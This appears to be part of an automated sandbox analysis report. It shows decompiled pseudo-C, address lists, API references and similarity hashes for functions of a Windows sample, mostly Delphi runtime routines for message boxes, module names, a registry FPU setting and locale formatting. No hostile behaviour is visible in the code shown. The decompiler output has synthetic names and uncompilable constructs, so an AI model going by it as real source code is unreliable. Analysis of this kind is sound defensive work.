					while(_t151 <=  &_v131113) {
						if( *_t203 > 0) {
							if(_v112653 == 0) {
								_t133 =  *0x41203c; // 0x401298
								_t151 = E0040237C(E00404914(_t133), _t151);
								_v112653 = 1;
							}
							if(_v112654 != 0) {
								 *_t151 = 0x2c;
								_t156 = _t151 + 1;
								 *_t156 = 0x20;
								_t157 = _t156 + 1;
								__eflags = _t156 + 1;
							} else {
								 *_t151 = 0xd;
								 *((char*)(_t151 + 1)) = 0xa;
								_t164 = E00402260(_v112668 + 1, _t151 + 2);
								 *_t164 = 0x20;
								_t165 = _t164 + 1;
								 *_t165 = 0x2d;
								 *((char*)(_t165 + 1)) = 0x20;
								_t128 = E00402260(_v112672, _t165 + 2);
								_t129 =  *0x412044; // 0x401300
								_t157 = E0040237C(E00404914(_t129), _t128);
								_v112654 = 1;
							}
							_t106 = _t199 - 1;
							_t228 = _t106;
							if(_t228 < 0) {
								_t107 =  *0x412048; // 0x40130c
								_t158 = E0040237C(E00404914(_t107), _t157);
							} else {
								if(_t228 == 0) {
									_t113 =  *0x41204c; // 0x401314
									_t158 = E0040237C(E00404914(_t113), _t157);
								} else {
									if(_t106 == 1) {
										_t118 =  *0x412050; // 0x401320
										_t158 = E0040237C(E00404914(_t118), _t157);
									} else {
										_t158 = E00402394( *((intOrPtr*)(_t203 - 4)), _t157);
									}
								}
							}
							 *_t158 = 0x20;
							_t159 = _t158 + 1;
							 *_t159 = 0x78;
							 *((char*)(_t159 + 1)) = 0x20;
							_t151 = E00402260( *_t203, _t159 + 2);
						}
						_t199 = _t199 - 1;
						_t203 = _t203 - 8;
						if(_t199 != 0xffffffff) {
							continue;
						} else {
							goto L39;
						}
					}
					L39:
					_v112668 = _v112672;
					_v112680 = _v112680 + 0x800;
					_v112676 =  &(_v112676[0x10]);
					_t57 =  &_v112660;
					 *_t57 = _v112660 - 1;
				} while ( *_t57 != 0);
				if(_v112652 <= 0) {
					L49:
					_t90 =  *0x412054; // 0x401330
					E0040237C(E00404914(_t90), _t151);
					_t94 =  *0x412058; // 0x401334
					_t76 = MessageBoxA(0,  &_v161832, _t94, 0x2010);
					goto L50;
				}
				if(_v112653 != 0) {
					 *_t151 = 0xd;
					_t153 = _t151 + 1;
					 *_t153 = 0xa;
					_t154 = _t153 + 1;
					 *_t154 = 0xd;
					_t155 = _t154 + 1;
					 *_t155 = 0xa;
					_t151 = _t155 + 1;
				}
				_t96 =  *0x412040; // 0x4012c0
				_t151 = E0040237C(E00404914(_t96), _t151);
				_t205 = _v112652 - 1;
				if(_t205 >= 0) {
					_t206 = _t205 + 1;
					_t200 = 0;
					_v112680 =  &_v129064;
					L45:
					L45:
					if(_t200 != 0) {
						 *_t151 = 0x2c;
						_t152 = _t151 + 1;
						 *_t152 = 0x20;
						_t151 = _t152 + 1;
					}
					_t151 = E00402260( *_v112680, _t151);
					if(_t151 >  &_v131113) {
						goto L49;
					}
					_t200 = _t200 + 1;
					_v112680 = _v112680 + 4;
					_t206 = _t206 - 1;
					if(_t206 != 0) {
						goto L45;
					}
				}
				L1:
				_t215 = _t215 + 0xfffff004;
				_push(_t70);
				_t70 = _t70 - 1;
				if(_t70 != 0) {
					goto L1;
				} else {
					E00403250( &_v112644, 0x1b800);
					E00403250( &_v129064, 0x4000);
					_t76 = 0;
					_v112652 = 0;
					_v112645 = 1;
					_t197 =  *0x413a28; // 0x413a24
					goto L12;
				}
			}

0x004027bb
0x004027bc
0x004027bc
0x00000000
0x00402897
0x00402817
0x0040281c
0x0040281e
0x00402820
0x00402894
0x00402894
0x00402894
0x00000000
0x00000000
0x00000000
0x00000000
0x00402822
0x00402822
0x00402827
0x00402829
0x0040282f
0x00402831
0x00402837
0x00402844
0x0040284e
0x00402856
0x0040285e
0x00402863
0x00402865
0x00402867
0x0040287a
0x00402881
0x00402881
0x00402881
0x00402881
0x00402865
0x00402839
0x0040283c
0x00402841
0x00402837
0x00402889
0x0040288e
0x00402890
0x00402890
0x00000000
0x00402822
0x004028a3
0x004028e2
0x004028b0
0x004028b5
0x004028b7
0x004028b9
0x004028c0
0x004028cc
0x004028d2
0x004028d9
0x004028d9
0x004028d9
0x004028d9
0x004028df
0x004028df
0x004028df
0x004028fd
0x00402b92
0x00402b98
0x00402b98
0x00402903
0x0040290c
0x00402912
0x0040292e
0x00402930
0x0040293a
0x0040294a
0x00402950
0x0040295c
0x00402962
0x00402969
0x00402974
0x00402976
0x00402987
0x00402994
0x00402996
0x004029ae
0x004029b0
0x004029b0
0x004029be
0x00402a16
0x00402a19
0x00402a1a
0x00402a1d
0x00402a1d
0x004029c0
0x004029c0
0x004029c4
0x004029d6
0x004029d8
0x004029db
0x004029dc
0x004029e0
0x004029ec
0x004029f3
0x00402a0b
0x00402a0d
0x00402a0d
0x00402a20
0x00402a20
0x00402a23
0x00402a2c
0x00402a44
0x00402a25
0x00402a25
0x00402a48
0x00402a60
0x00402a27
0x00402a28
0x00402a64
0x00402a7c
0x00402a2a
0x00402a8a
0x00402a8a
0x00402a28
0x00402a25
0x00402a8c
0x00402a8f
0x00402a90
0x00402a94
0x00402aa1
0x00402aa1
0x00402aa3
0x00402aa4
0x00402aaa
0x00000000
0x00000000
0x00000000
0x00000000
0x00402aaa
0x00402ab0
0x00402ab6
0x00402abc
0x00402ac6
0x00402acd
0x00402acd
0x00402acd
0x00402ae0
0x00402b61
0x00402b61
0x00402b74
0x00402b7e
0x00402b8d
0x00000000
0x00402b8d
0x00402ae9
0x00402aeb
0x00402aee
0x00402aef
0x00402af2
0x00402af3
0x00402af6
0x00402af7
0x00402afa
0x00402afa
0x00402afb
0x00402b13
0x00402b1b
0x00402b1e
0x00402b20
0x00402b21
0x00402b29
0x00000000
0x00402b2f
0x00402b31
0x00402b33
0x00402b36
0x00402b37
0x00402b3a
0x00402b3a
0x00402b4a
0x00402b54
0x00000000
0x00000000
0x00402b56
0x00402b57
0x00402b5e
0x00402b5f
0x00000000
0x00000000
0x00402b5f
0x004027c1
0x004027c1
0x004027c7
0x004027c8
0x004027c9
0x00000000
0x004027cb
0x004027e4
0x004027f6
0x004027fb
0x004027fd
0x00402803
0x0040280a
0x00000000
0x0040280a

APIs

MessageBoxA.USER32 ref: 00402B8D

Strings

$:A, xrefs: 00402897
7, xrefs: 00402930
$:A, xrefs: 0040280A
, xrefs: 00402AC6

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: Message
String ID: $$:A$$:A$7
API String ID: 2030045667-2368080441
Opcode ID: 4013aa1c4d508e0f21f628e91fd2f66dd9b67919b6327f81295100d5b103fb88
Instruction ID: 5e81d980581d028b30a088fdd03a9cb8372552a81488182f994bcd5140d075e0
Opcode Fuzzy Hash: 4013aa1c4d508e0f21f628e91fd2f66dd9b67919b6327f81295100d5b103fb88
Instruction Fuzzy Hash: A9B1C430B002548BCB21EB2DCE88B9977E4AB4D344F1481F6E548E73D2DBB89D85CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004094C0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E004094C0(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v534;
				short _v1056;
				short _v1568;
				struct _MEMORY_BASIC_INFORMATION _v1596;
				char _v1600;
				intOrPtr _v1604;
				char _v1608;
				intOrPtr _v1612;
				char _v1616;
				intOrPtr _v1620;
				char _v1624;
				char* _v1628;
				char _v1632;
				char _v1636;
				char _v1640;
				struct HINSTANCE__* _t44;
				intOrPtr _t55;
				struct HINSTANCE__* _t57;
				signed int _t76;
				long _t79;
				void* _t82;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr* _t102;
				void* _t105;
				void* _t113;

				_t113 = __fp0;
				_v1640 = 0;
				_v8 = __ecx;
				_t82 = __edx;
				_t102 = __eax;
				_push(_t105);
				_push(0x40966c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t105 + 0xfffff99c;
				VirtualQuery(__edx,  &_v1596, 0x1c);
				if(_v1596.State != 0x1000) {
					L2:
					_t44 =  *0x415b48; // 0x400000
					GetModuleFileNameW(_t44,  &_v1056, 0x105);
					_v12 = E004094B4(_t82);
				} else {
					_t79 = GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105);
					_t108 = _t79;
					if(_t79 != 0) {
						_t85 = _t82 - _v1596.AllocationBase;
						__eflags = _t85;
						_v12 = _t85;
					} else {
						goto L2;
					}
				}
				E00408128( &_v534, 0x104, E0040A48C() + 2, _t108);
				_t83 = 0x409680;
				_t100 = 0x409680;
				_t95 =  *0x406d5c; // 0x406db4
				if(E0040392C(_t102, _t95) != 0) {
					_t83 = E00404D24( *((intOrPtr*)(_t102 + 4)));
					_t76 = E004080DC(_t83);
					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {
						_t100 = 0x409684;
					}
				}
				_t55 =  *0x412c70; // 0x406b7c
				_t18 = _t55 + 4; // 0xffe7
				_t57 =  *0x415b48; // 0x400000
				LoadStringW(E00405B90(_t57),  *_t18,  &_v1568, 0x100);
				E00403814( *_t102,  &_v1640);
				_v1636 = _v1640;
				_v1632 = 0x11;
				_v1628 =  &_v534;
				_v1624 = 0xa;
				_v1620 = _v12;
				_v1616 = 5;
				_v1612 = _t83;
				_v1608 = 0xa;
				_v1604 = _t100;
				_v1600 = 0xa;
				_push( &_v1636);
				E00408290(_v8,  &_v1568, _a4, _t113);
				E004080DC(_v8);
				_t98 = 4;
				 *[fs:eax] = _t98;
				_push(E00409673);
				return L00404C88( &_v1640);
			}

0x004094c0
0x004094ce
0x004094d4
0x004094d7
0x004094d9
0x004094dd
0x004094de
0x004094e3
0x004094e6
0x004094f3
0x00409502
0x00409520
0x0040952c
0x00409532
0x0040953e
0x00409504
0x00409517
0x0040951c
0x0040951e
0x00409543
0x00409543
0x00409549
0x00000000
0x00000000
0x00000000
0x0040951e
0x0040956b
0x00409570
0x00409575
0x0040957c
0x00409589
0x00409593
0x00409597
0x0040959e
0x004095a8
0x004095a8
0x0040959e
0x004095b9
0x004095be
0x004095c2
0x004095cd
0x004095da
0x004095e5
0x004095eb
0x004095f8
0x004095fe
0x00409608
0x0040960e
0x00409615
0x0040961b
0x00409622
0x00409628
0x00409635
0x00409644
0x0040964c
0x00409655
0x00409658
0x0040965b
0x0040966b

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040966C), ref: 004094F3
GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00409517
GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 00409532
LoadStringW.USER32(00000000,0000FFE7,?,00000100), ref: 004095CD

Strings

|k@, xrefs: 004095B9

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID: |k@
API String ID: 3990497365-1384102874
Opcode ID: 6f085f8ec88251c6b4d6bed15921bf942687a9faf34eb56f100020bfa587058b
Instruction ID: 812a0db5b2e8149b5403e96b780088374b8dce2bc0e6689b4533de7bda3b7772
Opcode Fuzzy Hash: 6f085f8ec88251c6b4d6bed15921bf942687a9faf34eb56f100020bfa587058b
Instruction Fuzzy Hash: A04134719012189FDB20EF65CD81BCAB7F9AB84304F4144FAE508E7282D77A9E94CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004094BE, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E004094BE(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v534;
				short _v1056;
				short _v1568;
				struct _MEMORY_BASIC_INFORMATION _v1596;
				char _v1600;
				intOrPtr _v1604;
				char _v1608;
				intOrPtr _v1612;
				char _v1616;
				intOrPtr _v1620;
				char _v1624;
				char* _v1628;
				char _v1632;
				char _v1636;
				char _v1640;
				struct HINSTANCE__* _t44;
				intOrPtr _t55;
				struct HINSTANCE__* _t57;
				signed int _t76;
				long _t79;
				void* _t82;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr* _t102;
				void* _t105;
				void* _t113;

				_t113 = __fp0;
				_v1640 = 0;
				_v8 = __ecx;
				_t82 = __edx;
				_t102 = __eax;
				_push(_t105);
				_push(0x40966c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t105 + 0xfffff99c;
				VirtualQuery(__edx,  &_v1596, 0x1c);
				if(_v1596.State != 0x1000) {
					L3:
					_t44 =  *0x415b48; // 0x400000
					GetModuleFileNameW(_t44,  &_v1056, 0x105);
					_v12 = E004094B4(_t82);
				} else {
					_t79 = GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105);
					_t108 = _t79;
					if(_t79 != 0) {
						_t85 = _t82 - _v1596.AllocationBase;
						__eflags = _t85;
						_v12 = _t85;
					} else {
						goto L3;
					}
				}
				E00408128( &_v534, 0x104, E0040A48C() + 2, _t108);
				_t83 = 0x409680;
				_t100 = 0x409680;
				_t95 =  *0x406d5c; // 0x406db4
				if(E0040392C(_t102, _t95) != 0) {
					_t83 = E00404D24( *((intOrPtr*)(_t102 + 4)));
					_t76 = E004080DC(_t83);
					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {
						_t100 = 0x409684;
					}
				}
				_t55 =  *0x412c70; // 0x406b7c
				_t18 = _t55 + 4; // 0xffe7
				_t57 =  *0x415b48; // 0x400000
				LoadStringW(E00405B90(_t57),  *_t18,  &_v1568, 0x100);
				E00403814( *_t102,  &_v1640);
				_v1636 = _v1640;
				_v1632 = 0x11;
				_v1628 =  &_v534;
				_v1624 = 0xa;
				_v1620 = _v12;
				_v1616 = 5;
				_v1612 = _t83;
				_v1608 = 0xa;
				_v1604 = _t100;
				_v1600 = 0xa;
				_push( &_v1636);
				E00408290(_v8,  &_v1568, _a4, _t113);
				E004080DC(_v8);
				_t98 = 4;
				 *[fs:eax] = _t98;
				_push(E00409673);
				return L00404C88( &_v1640);
			}

0x004094be
0x004094ce
0x004094d4
0x004094d7
0x004094d9
0x004094dd
0x004094de
0x004094e3
0x004094e6
0x004094f3
0x00409502
0x00409520
0x0040952c
0x00409532
0x0040953e
0x00409504
0x00409517
0x0040951c
0x0040951e
0x00409543
0x00409543
0x00409549
0x00000000
0x00000000
0x00000000
0x0040951e
0x0040956b
0x00409570
0x00409575
0x0040957c
0x00409589
0x00409593
0x00409597
0x0040959e
0x004095a8
0x004095a8
0x0040959e
0x004095b9
0x004095be
0x004095c2
0x004095cd
0x004095da
0x004095e5
0x004095eb
0x004095f8
0x004095fe
0x00409608
0x0040960e
0x00409615
0x0040961b
0x00409622
0x00409628
0x00409635
0x00409644
0x0040964c
0x00409655
0x00409658
0x0040965b
0x0040966b

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040966C), ref: 004094F3
GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00409517
GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 00409532
LoadStringW.USER32(00000000,0000FFE7,?,00000100), ref: 004095CD

Strings

|k@, xrefs: 004095B9

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID: |k@
API String ID: 3990497365-1384102874
Opcode ID: 43087fe4bc38f8cd41f2fd5395c9c061ec226a594088f0491a4063f5bd6d0949
Instruction ID: 1ed4c405d868999d2a68b461cc40520038d24ac33ddd5ad5e87d9ce406dc7cf2
Opcode Fuzzy Hash: 43087fe4bc38f8cd41f2fd5395c9c061ec226a594088f0491a4063f5bd6d0949
Instruction Fuzzy Hash: 86414671A002189FDB20EF55CC41BCAB7F99B84304F4144FAE508E7282D7799E94CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403714, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00403714() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x41201c & 0x0000ffff;
				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t14 =  *0x41201c & 0xffc0 | _v12 & 0x3f;
					 *0x41201c = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00403785);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExW(_v8, L"FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x40378c);
					return RegCloseKey(_v8);
				}
			}

0x00403715
0x00403717
0x00403721
0x0040373d
0x0040379f
0x004037a2
0x004037ab
0x0040373f
0x00403741
0x00403742
0x00403747
0x0040374a
0x0040374d
0x00403769
0x00403770
0x00403773
0x00403776
0x00403784
0x00403784

APIs

RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403736
RegQueryValueExW.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403785,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403769
RegCloseKey.ADVAPI32(?,0040378C,00000000,?,00000004,00000000,00403785,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040377F

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 0040372C
FPUMaskValue, xrefs: 00403760

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 6aeaf0bb9d8d3d66ce8c9309b5049384293a7d57b585f7f81df902abe7067c85
Instruction ID: 40a73df8a67999f4cbb9744d622e99770d6b6577c1e0934ef40092c26c129c87
Opcode Fuzzy Hash: 6aeaf0bb9d8d3d66ce8c9309b5049384293a7d57b585f7f81df902abe7067c85
Instruction Fuzzy Hash: B10152B5540318B9DB11DFA18D42BAABBACD708B01F208177BA00F75D0E6799A10D769

Uniqueness

Uniqueness Score: -1.00%

Function 00409140, Relevance: 7.6, APIs: 5, Instructions: 50
threadCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00409140(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x4091d7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E00408EB4(GetThreadLocale(), 0x4091f0, 0x100b,  &_v8);
				_t29 = E00407F10(0x4091f0, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoW(E0040908C, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x415c5c;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoW(E004090C8, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E004091DE);
				return L00404C88( &_v8);
			}

0x00409140
0x00409143
0x00409148
0x00409149
0x0040914e
0x00409151
0x00409167
0x00409179
0x00409183
0x00409193
0x00409198
0x0040919d
0x004091a2
0x004091a2
0x004091a8
0x004091ab
0x004091ab
0x004091bc
0x004091bc
0x004091c3
0x004091c6
0x004091c9
0x004091d6

APIs

GetThreadLocale.KERNEL32(?,00000000,004091D7,?,?,00000000), ref: 00409158

Part of subcall function 00408EB4: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00408ED2

GetThreadLocale.KERNEL32(00000000,00000004,00000000,004091D7,?,?,00000000), ref: 00409188
EnumCalendarInfoW.KERNEL32(Function_0000908C,00000000,00000000,00000004,00000000,004091D7,?,?,00000000), ref: 00409193
GetThreadLocale.KERNEL32(00000000,00000003,Function_0000908C,00000000,00000000,00000004,00000000,004091D7,?,?,00000000), ref: 004091B1
EnumCalendarInfoW.KERNEL32(Function_000090C8,00000000,00000000,00000003,Function_0000908C,00000000,00000000,00000004,00000000,004091D7,?,?,00000000), ref: 004091BC

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 1287b01eaffe2f7a89d76bee5e253d8467206198faf148c79f9b7f744e170f41
Instruction ID: 083ce9a4cc77aebe24cd927d5b3fe7a8d4ed640c99c3cc4bc0f0e781bc0fc52a
Opcode Fuzzy Hash: 1287b01eaffe2f7a89d76bee5e253d8467206198faf148c79f9b7f744e170f41
Instruction Fuzzy Hash: EF01DF70304604AAF701AB65CC12B5A32ACDB85728F62053AF900BB6C7DA7C9E0082AC

Uniqueness

Uniqueness Score: -1.00%

Function 004091F4, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 177
threadCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004091F4(signed int __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t69;
				signed int _t72;
				signed int _t75;
				signed int _t78;
				signed int _t81;
				signed int _t97;
				intOrPtr _t112;
				void* _t113;
				signed int _t114;
				signed int _t122;
				signed int _t131;
				intOrPtr _t152;
				void* _t164;
				signed int _t166;
				intOrPtr _t170;
				void* _t171;

				_t171 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t164 = __edx;
				_v8 = __eax;
				L00404C80(_v8);
				_push(_t170);
				_push(0x409427);
				 *[fs:eax] = _t170;
				_t131 = 1;
				E00404C98(_t164, 0,  *[fs:eax]);
				E00408EB4(GetThreadLocale(), 0x409444, 0x1009,  &_v16);
				if(E00407F10(0x409444, 1, _t171) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t69 = E00404EF4(E00404830( &_v8));
						__eflags = _t131 - _t69;
						if(_t131 > _t69) {
							break;
						}
						_t166 = _v8;
						__eflags = _t166;
						if(_t166 != 0) {
							__eflags =  *((short*)(_t166 - 0xa)) - 2;
							if( *((short*)(_t166 - 0xa)) != 2) {
								_t166 = E00404820( &_v8);
							}
						}
						__eflags =  *((short*)(_t166 + _t131 * 2 - 2)) - 0xd800;
						if( *((short*)(_t166 + _t131 * 2 - 2)) < 0xd800) {
							L22:
							_t72 = E00408164(_v8 + _t131 * 2 - 2, 2, 0x409448);
							__eflags = _t72;
							if(_t72 != 0) {
								_t75 = E00408164(_v8 + _t131 * 2 - 2, 4, L"yyyy");
								__eflags = _t75;
								if(_t75 != 0) {
									_t78 = E00408164(_v8 + _t131 * 2 - 2, 2, L"yy");
									__eflags = _t78;
									if(_t78 != 0) {
										_t81 = ( *(_v8 + _t131 * 2 - 2) & 0x0000ffff) - 0x59;
										__eflags = _t81;
										if(_t81 == 0) {
											L30:
											E00404F98(_t164, 0x4094b0);
											L32:
											_t131 = _t131 + 1;
											__eflags = _t131;
											continue;
										}
										__eflags = _t81 != 0x20;
										if(_t81 != 0x20) {
											E00404E04();
											E00404F98(_t164, _v28);
											goto L32;
										}
										goto L30;
									}
									E00404F98(_t164, 0x40949c);
									_t131 = _t131 + 1;
									goto L32;
								}
								E00404F98(_t164, L"eeee");
								_t131 = _t131 + 3;
								goto L32;
							}
							E00404F98(_t164, 0x40945c);
							_t131 = _t131 + 1;
							goto L32;
						} else {
							__eflags =  *((short*)(_t166 + _t131 * 2 - 2)) - 0xdfff;
							if( *((short*)(_t166 + _t131 * 2 - 2)) > 0xdfff) {
								goto L22;
							}
							_t97 = E0040A3F8(_v8, _t131, _t131, _t166) >> 1;
							if(__eflags < 0) {
								asm("adc eax, 0x0");
							}
							_v12 = _t97;
							E0040525C(_v8, _t131, _t131, _t164, _t166,  &_v24);
							E00404F98(_t164, _v24);
							_t131 = _t131 + _v12;
							continue;
						}
					}
					L34:
					_pop(_t152);
					 *[fs:eax] = _t152;
					_push(E0040942E);
					L00404C90( &_v28, 4);
					return L00404C88( &_v8);
				}
				_t112 =  *0x415c34; // 0x9
				_t113 = _t112 - 4;
				if(_t113 == 0 || _t113 + 0xfffffff3 - 2 < 0) {
					_t114 = 1;
				} else {
					_t114 = 0;
				}
				if(_t114 == 0) {
					E00404C98(_t164, _v8);
				} else {
					while(_t131 <= E00404EF4(E00404830( &_v8))) {
						_t122 = ( *(_v8 + _t131 * 2 - 2) & 0x0000ffff) - 0x47;
						__eflags = _t122;
						if(_t122 != 0) {
							__eflags = _t122 != 0x20;
							if(_t122 != 0x20) {
								E00404E04();
								E00404F98(_t164, _v20);
							}
						}
						_t131 = _t131 + 1;
						__eflags = _t131;
					}
				}
			}

0x004091f4
0x004091f9
0x004091fa
0x004091fb
0x004091fc
0x004091fd
0x004091fe
0x004091ff
0x00409200
0x00409202
0x00409204
0x0040920a
0x00409211
0x00409212
0x0040921a
0x0040921d
0x00409226
0x0040923e
0x00409256
0x004093ef
0x004093f7
0x004093fc
0x004093fe
0x00000000
0x00000000
0x004092ca
0x004092cd
0x004092cf
0x004092d6
0x004092da
0x004092e7
0x004092e7
0x004092da
0x004092e9
0x004092f0
0x00409332
0x00409343
0x00409348
0x0040934a
0x0040936f
0x00409374
0x00409376
0x0040939a
0x0040939f
0x004093a1
0x004093ba
0x004093ba
0x004093be
0x004093c6
0x004093cd
0x004093ee
0x004093ee
0x004093ee
0x00000000
0x004093ee
0x004093c0
0x004093c4
0x004093df
0x004093e9
0x00000000
0x004093e9
0x00000000
0x004093c4
0x004093aa
0x004093af
0x00000000
0x004093af
0x0040937f
0x00409384
0x00000000
0x00409384
0x00409353
0x00409358
0x00000000
0x004092f2
0x004092f2
0x004092f9
0x00000000
0x00000000
0x00409305
0x00409307
0x00409309
0x00409309
0x0040930c
0x0040931b
0x00409325
0x0040932a
0x00000000
0x0040932a
0x004092f0
0x00409404
0x00409406
0x00409409
0x0040940c
0x00409419
0x00409426
0x00409426
0x0040925c
0x00409261
0x00409264
0x00409272
0x0040926e
0x0040926e
0x0040926e
0x00409276
0x004092c0
0x00409278
0x004092a5
0x00409284
0x00409284
0x00409288
0x0040928a
0x0040928e
0x00409295
0x0040929f
0x0040929f
0x0040928e
0x004092a4
0x004092a4
0x004092a4
0x004092b6

APIs

GetThreadLocale.KERNEL32(?,00000000,00409427,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040922F

Part of subcall function 00408EB4: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00408ED2

Strings

eeee, xrefs: 0040937A
yyyy, xrefs: 0040935E
ggg, xrefs: 0040934E

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
